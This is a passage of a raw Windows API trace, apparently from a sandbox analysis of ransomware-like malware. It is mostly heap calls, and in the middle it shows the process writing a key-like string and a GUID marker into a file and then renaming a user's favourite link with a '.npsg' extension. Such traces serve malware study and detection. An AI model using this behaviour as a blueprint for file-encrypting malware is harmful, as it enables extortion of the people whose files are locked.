RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400818 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.931] GetCurrentThreadId () returned 0x5b4 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82e58 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.932] GetCurrentThreadId () returned 0x5b4 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0237.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400860 [0237.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400800 [0237.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400818 [0237.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34007e8 [0237.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400878 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400848 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400830 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400890 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400830 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400830 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400800 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0237.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0237.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400800 | out: hHeap=0x620000) returned 1 [0237.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400830 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400878 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400818 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007e8 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34007d0 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409758 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.937] WriteFile (in: hFile=0x644, lpBuffer=0x64e690*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x64e690*, lpNumberOfBytesWritten=0x39afb14*=0x80, lpOverlapped=0x0) returned 1 [0237.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.937] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.937] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7caa0 | out: hHeap=0x620000) returned 1 [0237.938] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.938] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.938] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.938] CloseHandle (hObject=0x644) returned 1 [0237.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0237.939] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.npsg")) returned 1 [0237.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.942] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0237.944] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0237.944] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0237.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0237.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c45a0 | out: hHeap=0x620000) returned 1 [0237.944] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0237.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c45a0 [0237.944] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0237.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.947] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 